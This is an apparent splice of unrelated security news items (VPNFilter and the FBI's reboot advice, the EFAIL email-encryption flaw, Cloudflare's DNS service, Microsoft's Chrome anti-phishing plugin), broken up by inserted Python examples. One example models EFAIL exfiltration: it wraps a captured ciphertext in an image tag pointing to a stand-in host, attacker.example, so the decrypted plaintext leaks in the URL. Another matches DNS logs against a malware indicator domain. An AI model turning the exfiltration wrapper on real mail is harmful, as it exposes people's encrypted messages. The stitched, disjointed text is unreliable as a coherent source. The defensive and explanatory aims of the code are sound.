Tip: Receiving all of these GDPR/Privacy emails is a great opportunity for you to take an inventory of everybody who has your data and/or personal information.
The FBI is advising users of consumer-grade routers and network-attached storage devices to reboot them as soon as possible to counter Russian-engineered malware that has infected hundreds of thousands of devices.
Researchers from Cisco’s Talos security team first disclosed the existence of the malware on Wednesday. The detailed report said the malware infected more than 500,000 devices made by Linksys, Mikrotik, Netgear, QNAP, and TP-Link. Known as VPNFilter, the malware allowed attackers to collect communications, launch attacks on others, and permanently destroy the devices with a single command. The report said the malware was developed by hackers working for an advanced nation, possibly Russia, and advised users of affected router models to perform a factory reset, or at a minimum to reboot.
Later in the day, The Daily Beast reported that VPNFilter was indeed developed by a Russian hacking group, one known by a variety of names, including Sofacy, Fancy Bear, APT 28, and Pawn Storm. The Daily Beast also said the FBI had seized an Internet domain VPNFilter used as a backup means to deliver later stages of the malware to devices that were already infected with the initial stage 1. The seizure meant that the primary and secondary means to deliver stages 2 and 3 had been dismantled, leaving only a third fallback, which relied on attackers sending special packets to each infected device.
The redundant mechanisms for delivering the later stages address a fundamental shortcoming in VPNFilter—stages 2 and 3 can’t survive a reboot, meaning they are wiped clean as soon as a device is restarted. Instead, only stage 1 remains. Presumably, once an infected device reboots, stage 1 will cause it to reach out to the recently seized ToKnowAll.com address. The FBI’s advice to reboot small office and home office routers and NAS devices capitalizes on this limitation. In a statement published Friday, FBI officials suggested that users of all consumer-grade routers, not just those known to be vulnerable to VPNFilter, protect themselves.
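One way to act on the single indicator the article names, ToKnowAll.com: after the seizure, a stage 1 implant that survives a reboot will still try to reach that name, so a lookup for it in the query log of a resolver the suspect devices use is a reason to factory-reset the device rather than just reboot it. The script below is an added example, not code from Talos or the FBI; the log lines are constructed in dnsmasq's query-log style and come from no real device. One caveat: an infected router that talks straight to its upstream resolver will not appear in its own dnsmasq log, so this is most useful on a separate resolver or firewall that sits upstream of the routers and NAS boxes being checked.

```python
"""Flag LAN hosts whose DNS queries name ToKnowAll.com, the stage-1 fallback
domain the FBI seized. Added example; the log lines below are constructed in
dnsmasq's query-log style and are not taken from any real device."""
import re
from collections import defaultdict

# Indicator named in the article. Matching covers the registered name and any
# label beneath it, case-insensitively, so "ToKnowAll.com" and
# "update.toknowall.com" both hit, while "nottoknowall.com" does not.
WATCHED_DOMAINS = ("toknowall.com",)

# dnsmasq logs queries as: "query[A] name from client"
QUERY_RE = re.compile(
    r"query\[(?P<qtype>[A-Z]+)\]\s+(?P<name>\S+)\s+from\s+(?P<client>\S+)"
)

# Constructed sample log (not real traffic).
SAMPLE_LOG = """\
May 25 08:13:02 dnsmasq[742]: query[A] www.example.com from 192.168.1.10
May 25 08:13:05 dnsmasq[742]: query[A] ToKnowAll.com from 192.168.1.1
May 25 08:13:05 dnsmasq[742]: query[AAAA] toknowall.com. from 192.168.1.1
May 25 08:14:40 dnsmasq[742]: query[A] photos.example.net from 192.168.1.23
May 25 08:15:01 dnsmasq[742]: query[A] update.toknowall.com from 192.168.1.40
""".splitlines()


def is_watched(name: str) -> bool:
    """True if `name` is a watched domain or a subdomain of one."""
    name = name.lower().rstrip(".")  # normalise case and a trailing root dot
    return any(name == d or name.endswith("." + d) for d in WATCHED_DOMAINS)


def suspicious_clients(lines):
    """Map each client IP that queried a watched name to the names it asked for."""
    hits = defaultdict(list)
    for line in lines:
        m = QUERY_RE.search(line)
        if m and is_watched(m.group("name")):
            hits[m.group("client")].append(m.group("name"))
    return dict(hits)


if __name__ == "__main__":
    for client, names in suspicious_clients(SAMPLE_LOG).items():
        print(f"{client}: {', '.join(names)}  <- factory-reset this device")
```

Feed it `journalctl -u dnsmasq` or the equivalent query log from your resolver; a hit is not proof on its own, but on a home or small-office network there is no legitimate reason for a device to resolve that name.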
This week’s bug of the month is the trendily-named EFAIL.
Like many groovy bugs these days, it’s both a BWAIN (bug with an impressive name) and a BWIVOL (bug with its very own logo, shown in the image at the top of this article).
The name is a pun of sorts on the word “email”, and the bug is caused by a flaw in the specifications set down for two popular standards used for email encryption, namely OpenPGP and S/MIME.
Simply put, the EFAIL vulnerabilities are a pair of security holes that a crook might be able to use to trick recipients of encrypted messages into leaking out some or all of their decrypted content.
Note that this attack only applies if you are using S/MIME or OpenPGP for end-to-end email encryption.
If you aren’t using either of these add-ons in your email client, this vulnerability doesn’t affect you – after all, if the crooks can sniff out your original messages and they’re not encrypted, they’ve got your plaintext already.
Note also that this attack doesn’t work on all messages; it doesn’t work in real time; you need a copy of the original encrypted message; it only works with some email clients; and it pretty much requires both HTML rendering and remote content download turned on in your email client.
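The "HTML rendering plus remote content" condition above is the whole trick in the direct-exfiltration half of EFAIL: the attacker takes a captured ciphertext, wraps it between an opening `<img src="http://...` part and a closing `">` part, and a client that decrypts in place and renders the message as one HTML document ends up requesting an image whose URL contains the plaintext. The model below is an added example, not code from the article or from the EFAIL researchers: `attacker.example` is a hypothetical endpoint, the secret text is constructed, and `stand_in_encrypt`/`stand_in_decrypt` are a reversible base64 placeholder standing in for OpenPGP or S/MIME, not encryption.

```python
"""Model of EFAIL-style direct exfiltration. Added example; the ciphertext
'encryption' is a base64 stand-in, the secret is constructed, and
attacker.example is hypothetical."""
import base64
import re
from email import message_from_bytes
from email.mime.application import MIMEApplication
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText

ATTACKER_URL = "http://attacker.example/collect?d="  # hypothetical endpoint
SECRET = "Meet at the safehouse at 9pm"               # constructed plaintext
ENC_TYPE = "x-stand-in-encrypted"  # stands in for pkcs7-mime / pgp-encrypted


def stand_in_encrypt(plaintext: str) -> bytes:
    """Placeholder for the victim's real encryption; reversible, NOT secure."""
    return base64.b64encode(plaintext.encode())


def stand_in_decrypt(blob: bytes) -> str:
    return base64.b64decode(blob).decode()


def wrap_ciphertext(captured_ciphertext: bytes) -> bytes:
    """Attacker's message: open an <img> tag, splice in the ciphertext, close the tag."""
    msg = MIMEMultipart("mixed")
    msg["Subject"] = "Re: your message"
    msg.attach(MIMEText('<img src="' + ATTACKER_URL, "html"))
    msg.attach(MIMEApplication(captured_ciphertext, ENC_TYPE))
    msg.attach(MIMEText('">', "html"))
    return msg.as_bytes()


def decrypted_parts(raw: bytes):
    """Yield (content_type, text) for each leaf part, decrypting the encrypted one."""
    for part in message_from_bytes(raw).walk():
        if part.is_multipart():
            continue
        body = part.get_payload(decode=True)
        if part.get_content_type() == "application/" + ENC_TYPE:
            yield "text/plain", stand_in_decrypt(body)
        else:
            yield part.get_content_type(), body.decode()


def remote_image_urls(html: str):
    """The URLs an HTML renderer with remote content enabled would fetch."""
    return re.findall(r'<img[^>]*\ssrc="([^"]*)"', html, re.IGNORECASE)


def render_vulnerable(raw: bytes):
    """Concatenate every part into one HTML document, then load remote images."""
    html = "".join(text for _ctype, text in decrypted_parts(raw))
    return remote_image_urls(html)


def render_isolated(raw: bytes):
    """Render each part as its own document; decrypted text never joins attacker HTML."""
    urls = []
    for ctype, text in decrypted_parts(raw):
        if ctype == "text/html":
            urls.extend(remote_image_urls(text))
    return urls


if __name__ == "__main__":
    raw = wrap_ciphertext(stand_in_encrypt(SECRET))
    print("vulnerable client fetches:", render_vulnerable(raw))
    print("isolated client fetches:  ", render_isolated(raw))
```

In the vulnerable renderer the fetched URL is the attacker's endpoint with the plaintext appended, which is exactly the leak; with remote content disabled nothing is fetched at all, and with parts rendered in isolation the opening tag never gets its closing quote from the third part, so no URL is formed. This models only the direct-exfiltration variant; the second EFAIL hole, which edits the ciphertext itself, needs more than MIME wrapping and is not shown here.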
Are you looking for a free way to speed up your internet and gain some extra privacy in the process? Keep reading, because Cloudflare (the Web Performance & Security Company) is offering a free new DNS service. And it helped me improve the speed of my DNS lookups.
What is DNS?
DNS is short for Domain Name System. It is the internet protocol that lets your system use a domain name, such as the one in a URL, to identify a web server rather than requiring you to enter the server's actual IP address. For example, rather than typing the IP address of the Malwarebytes web server into your browser, you just type 'malwarebytes.com', and your system asks a 'DNS server' (a resolver), which either already knows the matching IP address or queries other DNS servers on your behalf and returns it. Unfortunately, if a popular DNS server is taken down or otherwise disrupted, many users are unable to reach their favorite websites, because without the IP address of the web server your system cannot find the site. When trying to explain the concept of DNS name resolution, I think finding a phone number for a certain person is a good analogy: there are several ways to find a person's phone number, and the same is true for resolving the IP address that belongs to a domain name.
Which DNS servers am I using now?
If you have to ask yourself that question, there's a good chance that you are using the DNS service provided by your internet provider. And while some of those are quite good, others are deplorable. Those who have looked into changing their DNS servers have probably ended up using Google's public DNS, or, if they were also interested in a web filter, Cisco's OpenDNS. IMHO those are the two most popular alternatives to the ones provided by ISPs around the globe, but many more are available.
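To make the two questions above concrete (what your system sends when it "reaches out to a DNS server", and which servers it is configured to use), here is an added example, not code from the Malwarebytes article: it reads the `nameserver` lines of a resolv.conf-style file (the Linux/macOS way to answer "which DNS servers am I using now?"; on Windows the equivalent is `Get-DnsClientServerAddress` or `ipconfig /all`), builds a raw DNS query for malwarebytes.com, and parses a reply, including the name-compression pointers real replies use. The resolv.conf text and the reply bytes are constructed for the demo, and 203.0.113.10 is a documentation address, not malwarebytes.com's real IP.

```python
"""What goes on the wire during a DNS lookup, and which resolvers this host is
configured to use. Added example; the resolv.conf text and the reply bytes are
constructed, and 203.0.113.10 is a documentation address."""
import os
import socket
import struct


def nameservers_from_resolv_conf(text: str) -> list:
    """Return the resolver addresses listed on 'nameserver' lines."""
    servers = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()  # drop comments
        fields = line.split()
        if len(fields) >= 2 and fields[0] == "nameserver":
            servers.append(fields[1])
    return servers


def build_query(name: str, txid: int) -> bytes:
    """Encode a standard A-record query: 12-byte header, labels, QTYPE=A, QCLASS=IN."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)  # flags: RD=1
    qname = b"".join(
        bytes([len(label)]) + label.encode("ascii")
        for label in name.rstrip(".").split(".")
    ) + b"\x00"
    return header + qname + struct.pack("!HH", 1, 1)


def read_name(msg: bytes, off: int):
    """Decode a possibly compressed name; return (name, offset just past it)."""
    labels, end, jumped = [], None, False
    while True:
        length = msg[off]
        if (length & 0xC0) == 0xC0:  # compression pointer to an earlier name
            ptr = struct.unpack("!H", msg[off:off + 2])[0] & 0x3FFF
            if not jumped:
                end = off + 2  # the field itself is only 2 bytes long
            jumped, off = True, ptr
            continue
        off += 1
        if length == 0:
            break
        labels.append(msg[off:off + length].decode("ascii"))
        off += length
    return ".".join(labels), (end if jumped else off)


def parse_response(msg: bytes, expected_txid: int):
    """Return (rcode, [(name, ttl, ipv4), ...]) for the A records in the answer."""
    txid, flags, qd, an, _ns, _ar = struct.unpack("!HHHHHH", msg[:12])
    if txid != expected_txid:
        # A reply whose ID does not match our query is not ours; drop it.
        raise ValueError("transaction ID mismatch")
    off = 12
    for _ in range(qd):
        _, off = read_name(msg, off)
        off += 4  # skip QTYPE and QCLASS
    answers = []
    for _ in range(an):
        name, off = read_name(msg, off)
        rtype, _rclass, ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10
        rdata = msg[off:off + rdlen]
        off += rdlen
        if rtype == 1 and rdlen == 4:  # A record
            answers.append((name, ttl, socket.inet_ntoa(rdata)))
    return flags & 0x000F, answers


def resolve(name: str, server: str, timeout: float = 2.0):
    """Send one UDP query to `server` (e.g. 1.1.1.1) and parse the reply. Needs network."""
    txid = int.from_bytes(os.urandom(2), "big")  # unpredictable ID resists blind spoofing
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(build_query(name, txid), (server, 53))
        reply, _ = sock.recvfrom(512)
    return parse_response(reply, txid)


# Constructed sample data.
SAMPLE_RESOLV_CONF = "# constructed example\nnameserver 192.168.1.1\nnameserver 1.1.1.1\nsearch lan\n"
SAMPLE_QUERY = build_query("malwarebytes.com", 0x1234)
# A reply to SAMPLE_QUERY: same ID, flags QR|RD|RA, the question echoed back, and one
# answer whose name is a pointer (0xC00C) to the question name at offset 12.
SAMPLE_REPLY = (
    struct.pack("!HHHHHH", 0x1234, 0x8180, 1, 1, 0, 0)
    + SAMPLE_QUERY[12:]
    + b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, 300, 4) + bytes([203, 0, 113, 10])
)

if __name__ == "__main__":
    print("configured resolvers:", nameservers_from_resolv_conf(SAMPLE_RESOLV_CONF))
    print("parsed sample reply:", parse_response(SAMPLE_REPLY, 0x1234))
```

Run it against a live resolver with `resolve("malwarebytes.com", "1.1.1.1")` and time it against the first address in your own resolv.conf to reproduce the speed comparison the article describes. Note that plain UDP DNS like this is neither encrypted nor authenticated; the transaction-ID check is the only thing separating a genuine answer from a forged one, which is why the DNS-over-HTTPS and DNS-over-TLS endpoints of a resolver are worth preferring when a client supports them.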
Chrome already provides effective protection against malicious sites: go somewhere with a poor reputation and you’ll get a big, scary red screen telling you that you’re about to do something unwise. But Microsoft believes it can do a better job than Google, and it has released a Chrome plugin, Windows Defender Browser Protection, that brings its own anti-phishing protection to Google’s browser.
Microsoft justifies the new plugin with reference to a 2017 report that claims that the company's Edge browser blocked 99 percent of phishing attempts, compared to 87 percent for Chrome and 70 percent for Firefox. The plugin brings Edge's protection to Chrome, so if the theory holds, it should bump that browser up to 99 percent, too.
The new extension doesn't appear to disable Chrome's own checking (or at least, it doesn't seem to be doing so for me), so at the very least it isn't likely to make you less safe, and with phishing being as widespread as it is, the extra protection probably doesn't hurt.
While making Windows users that extra bit safer is good for the Windows platform as a whole, this release does ever so slightly erode one of the purported benefits of the Edge browser. Microsoft has struggled to get people using its browser—while the core engine and security features are solid, the interface still has frustrating shortcomings—but one of its virtues was that it has different, and arguably better, defense-in-depth protection against phishing and malicious exploitation. In bringing that protection to Chrome, there’s one less reason to pick the Microsoft browser.